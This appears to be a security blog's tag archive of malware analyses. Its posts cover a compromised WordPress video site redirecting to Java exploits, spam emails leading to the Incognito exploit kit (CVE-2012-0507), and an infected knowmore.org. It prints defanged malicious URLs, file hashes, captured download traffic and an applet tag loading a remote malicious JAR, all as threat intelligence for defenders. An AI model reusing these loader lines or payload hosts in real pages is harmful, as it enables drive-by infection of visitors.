Tag Archives: java exploit

WordPress-how-to-videos(dot)com Spreads Java Exploits

When we analyzed few Twitter followers in one of our websites, we noted that there was an user that was following us, see the image:

We have analyzed the website (infected):

www (dot) wordpress-how-to-videos (dot) com

The website wordpress-how-to-videos(dot)com is hosted at BSE Software GmbH and its current IP address is 82.220.34.22 (330.hostserv.eu). The server machine is located in Switzerland (CH) and in the same server there are hosted other 0 websites. The domain is registered with the suffix COM and the keyword of the domain is wordpress-how-to-videos. The organization is hosttech GmbH.

The above website is used to redirect users to a malicious URL that tries to exploit the user’s browser with a Java exploit, as you can see from this image:

Java Exploit

The malicious redirect is activated only if the user browse the malicious website with a referer that contains the string of search engines, such as Google. Using the free service HTML Sniffer we can simulate the Google referer and we can see that we are redirected to the exploit URL:

The exploit URL seems to be updated very frequently:

garliccommercial .ru /pavilion?8
midwaydance .ru /pavilion?8

Both malicious URLs are hosted in this IP address:

206.53.52 .13

The Java exploit is loaded from another malicious URL:

ypcbpukqt. lflinkup .com /PJeHubmUDaovPDRCJxGMEzlYXdvvppcg

Pay attention when clicking on websites of your Twitter followers!

Spam “Your Bill Me Later notice” leads to Incognito exploit kit

Users have reported another malicious email message with subject “Your Bill Me Later notice” that states you have made a payment over the phone of $60.12 to Bill Me Later website. The email body is full of HREF links that point to a lot of malicious URLs, view a screenshot of the email message:

Your Bill Me Later notice

Email header details:

Received: from server.serverhk.net (69-164-193-60.magicnic.com [69.164.193.60])
Received: from [200.76.191.2] (helo=askokay.com) by server.serverhk.net with esmtpsa
Received: from [192.245.26.33] by m1.gns.snv.thisdomainl.com with SMTP; Wed, 16 May 2012 21:04:47 +1000
Received: from [68.117.211.36] by mailout.endmonthnow.com with NNFMP; Wed, 16 May 2012 20:54:02 +1000
Date: Wed, 16 May 2012 20:50:24 +1000
From: "Advera" askokay@askokay.com
Subject: Your Bill Me Later notice

The malicious extracted URLs are:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
hxxp:// www. studiobarsotti .it /3oXGcu61/index.html
hxxp:// www. eventosabsolue .com /qh8xhoi8/index.html
hxxp:// foxpublicidade .com .br /foRzthoD/index.html
hxxp:// www. studiobarsotti .it /GRYYEt3L/index.html
hxxp:// 76.12.158 .176 /3oXGcu61/index.html
hxxp:// 76.12.158 .176 /yWyXU9NU/index.html
hxxp:// www. eventosabsolue .com /ZmUaukzG/index.html
hxxp:// ewaleczek. cal24 .pl /5CY4dSwa/index.html
hxxp:// www. eventosabsolue .com /h03NraKE/index.html
hxxp:// foxpublicidade. com .br/yWyXU9NU/index.html
hxxp:// www. hso. co. jp/yWyXU9NU/index.html
hxxp:// zajacpiotr. hostit .pl /yWyXU9NU/index.html
hxxp:// zajacpiotr. hostit. pl /smWHegmd/index.html
hxxp:// ftp.joblines .sk /ri8ZKUip/index.html
hxxp:// www. sacmilani. com. ar /uvoNJPhk/index.html
hxxp:// foxpublicidade. com. br /smWHegmd/index.html
hxxp:// www. studiobarsotti .it /hTVbWtV1/index.html
hxxp:// jahu. com. br /FW3s2g0r/index.html
hxxp:// onecursos .com .br /foRzthoD/index.html
hxxp:// www. studiobarsotti .it /GRYYEt3L/index.html
hxxp:// www. studiobarsotti .it /yWyXU9NU/index.html
hxxp:// www. kayafamily .it /ZmUaukzG/index.html

Using URL Dump we can dump the HTML content:

Dumped HTML Content

From the dumped data, we can see it is the Incognito exploit kit.

Extacted malicious URLs:

hxxp:// bigdeal . my/ZyYJZ7F0/js.js

The malicious URLs redirect users to another malicious URL:

hxxp:// 69.163.34. 134 /showthread.php?t=977334ca118fcb8c

If we use URL Dump and we set the user-agent to Java, when we dump the content of the new malicious URL we can see it recognises from the user-agent that the user is using Java and the exploit tries to serve the infected Java applet:

Dumped Data

Link LinkedIn Mail leads to Incognito exploit kit

We have logged a new email that looks like to be sent by LinedIn:

Scam Email

The email header info shows it is a scam:

Received: from lhost10.forahost.net (server-178.211.48.24.as42926.net [178.211.48.24])
Received: from c9069568.static.spo.virtua.com.br ([201.6.149.104]:49583 helo=fixnot.com.tr) by lhost10.forahost.net
Date: Fri, 04 May 2012 08:34:11 -0700
From: "Order" @fixnot.com.tr
Subject: Link LinkedIn Mail

The email body contains also few malicious links:

hxxp:// gopeshmathur .com/ZgUBqavg/index.html

The dumped content of the URL is clear a Incognito exploit kit:

Incognito exploit kit URLs

All the new malicious links are still alive and they redirect users to:

Incognito exploit kit

The Java exploit JAR files are downloaded from:

hxxp:// 50.116.8. 93 /data/Pol.jar
hxxp:// 69.163.34 .114 /data/Pol.jar
File: Pol.jar
Size: 15404 bytes
MD5: 020B0B477706596E71DE25286ED77991
SHA1: C196A7B07BFE3D3593E93F7D98E910FA8E63AFF6
SHA256: F76AC6983135C7A69B5F07BC762F1AA478E2D49489090AC66882BC8065D1862B
SHA384: 9C6BF2971E1F86588A9A08A3F18C096FBC62A42CE6927E0A7D0AFDB56DA01DBC4A6F72F742CC62B510FC1085221753D5
SHA512: 5464424E028620C4821B740B89787C7A75E6A56401F98BD15BA94F1A9268D54411E41E97DAE86468F4BDA54160A023DCC45F134E97BC6655E31C9274F8A21FC0

The JAR file exploits the vulnerability in the Java Runtime Environment component of Oracle Java SE (CVE-2012-0507), more details from the oracle.com website:

Vulnerability in the Java Runtime Environment component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are 7 Update 2 and before, 6 Update 30 and before and 5.0 Update 33 and before. Easily exploitable vulnerability allows successful unauthenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized update, insert or delete access to some Java Runtime Environment accessible data as well as read access to a subset of Java Runtime Environment accessible data and ability to cause a partial denial of service (partial DOS) of Java Runtime Environment.

Other malicious Incognito exploit kit URLs:

hxxp:// ftp.coden .com .br /BhxC8VrP/index.html
hxxp:// generalcontractorsnc .com/nUUyHyvy/index.html
hxxp:// mccgedvalenca .com .br/JFs10e34/index.html
hxxp:// radiooisvira .com /mRpNLgWY/index.html
hxxp:// statisticsolympiad .org /gR2aietM/index.html

URLVoid scan reports:

http://www.urlvoid.com/scan/gopeshmathur .com
http://www.urlvoid.com/scan/jombangit .com
http://www.urlvoid.com/scan/shahinvestment .com
http://www.urlvoid.com/scan/mazyamana .com
http://www.ipvoid.com/scan/72.5.102.224
http://www.urlvoid.com/scan/ftp.coden .com .br
http://www.urlvoid.com/scan/generalcontractorsnc .com
http://www.urlvoid.com/scan/mccgedvalenca .com .br
http://www.urlvoid.com/scan/statisticsolympiad .org
http://www.urlvoid.com/scan/radiooisvira .com

Knowmore.org Infected with Malicious Javascript Code

John has informed us about a new possible website infected:

hxxp://www.knowmore. org

A fast scan with vscan.urlvoid.com report that the site is infected:

Report 2011-03-19 01:20:31 (GMT 1)
File Name knowmore-org
File Size 22121 bytes
File Type Unknown file
MD5 Hash d29b303c72a2330ac13155be0b280221
SHA1 Hash 3cf9d0637551e0ce5ac7a9ce243b35e13caf5e80
Detections: 3 / 9 (33 %)
Status INFECTED

We have dumped the content of the website:

Knowmore-org Dump

So we have browsed the website in our test environment and this is the result:

GET /count11.php HTTP/1.0
Referer: hxxp://knowmore. org/
Host: maribit. com
 
GET /in.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA== HTTP/1.0
Referer: hxxp://knowmore. org/
Host: kagrinn.cz. cc

Now there is a try to download a java applet:

<applet code='lort.cooter.class' archive='hxxp://kagrinn.cz. cc/efrthyjkfyiguytdsfsxz.jar' width='300' height='150'>

New network traffic:

GET /out.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA==&p=6 HTTP/1.0
Host: kagrinn.cz. cc

Response:

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 19 Mar 2011 00:54:42 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Accept-Ranges: bytes
Content-Length: 17920
Content-Disposition: inline; filename=setup.exe
 
MZ.............

Is downloaded the executable file setup.exe:

Report date: 2011-03-19 02:21:05 (GMT 1)
File name: setup.exe
File size: 17920 bytes
MD5 hash: 192b0b0d37d3a6666b584e876ca271e5
SHA1 hash: 7ca0e9f10a3cef8a7cc8b7831f675bd7089648f4
Detection rate: 0 on 9 (0%)

Another executable file is downloaded:

GET /client1.exe HTTP/1.0
Host: tamarer. com
 
HTTP/1.1 200 
Server: Apache
Content-Length: 650240
Content-Type: 
Last-Modified: Sat, 19 Mar 2011 00:55:16 GMT
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Fri, 18 Mar 2011 21:54:54 GMT
Last-Modified:Sat, 19 Mar 2011 00:52:41 GMT
Accept-Ranges:bytes
 
MZ.................

Files created during the infection:

c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\setup.exe
c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\MPC5.tmp
c:\WINDOWS\Temp\_ex-68.exe
c:\WINDOWS\system32\Packet.dll
c:\WINDOWS\system32\wpcap.dll
c:\WINDOWS\system32\drivers\npf.sys

Report date: 2011-03-19 02:36:06 (GMT 1)
File name: ex-68-exe
File size: 650240 bytes
MD5 hash: 32f73e995554b8e601c0da661e9a4edb
SHA1 hash: 237cafc9c7c30adee5ac795afd4371fbc19aa41d
Detection rate: 0 on 9 (0%)

Other curious network traffic:

GET /FlopK4F8XFP3oZ1PmQ.htm HTTP/1.1
Host: 98.232.48.112
Content-Length: 594
User-Agent: Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8) Gecko/20060107 Firefox/1.5

Now the malware try to send spam messages:

220 Comendo Mailfence V3
 
HELO XXX
 
250 ec3-node2.net.comendo.com says HELO to XXX:53746
 
MAIL FROM:<xxx@alcatel-lucent.com>
 
250 MAIL FROM accepted
 
RCPT TO:<xxx@lpmail.com>
 
250 RCPT TO accepted
 
DATA
 
354 continue.  finished with "\r\n.\r\n"
 
[...]
 
Subject: Bring extra pleasance to your xxx-life!
 
[...]
 
FDA-approved blue-blu-colored med to heal ED! 
hxxp://healthcontrol. dk/jhkop806.html
 
[...]

So the spam message contains a http link:

healthcontrol. dk/jhkop806.html

That redirects to:

pillrxdrugstorechains. at

URLVoid domains analysis:

http://www.urlvoid.com/scan/kagrinn.cz.cc
http://www.urlvoid.com/scan/knowmore.org
http://www.urlvoid.com/scan/tamarer.com
http://www.urlvoid.com/scan/healthcontrol.dk
http://www.ipvoid.com/scan/98.232.48.112
http://www.urlvoid.com/scan/pillrxdrugstorechains.at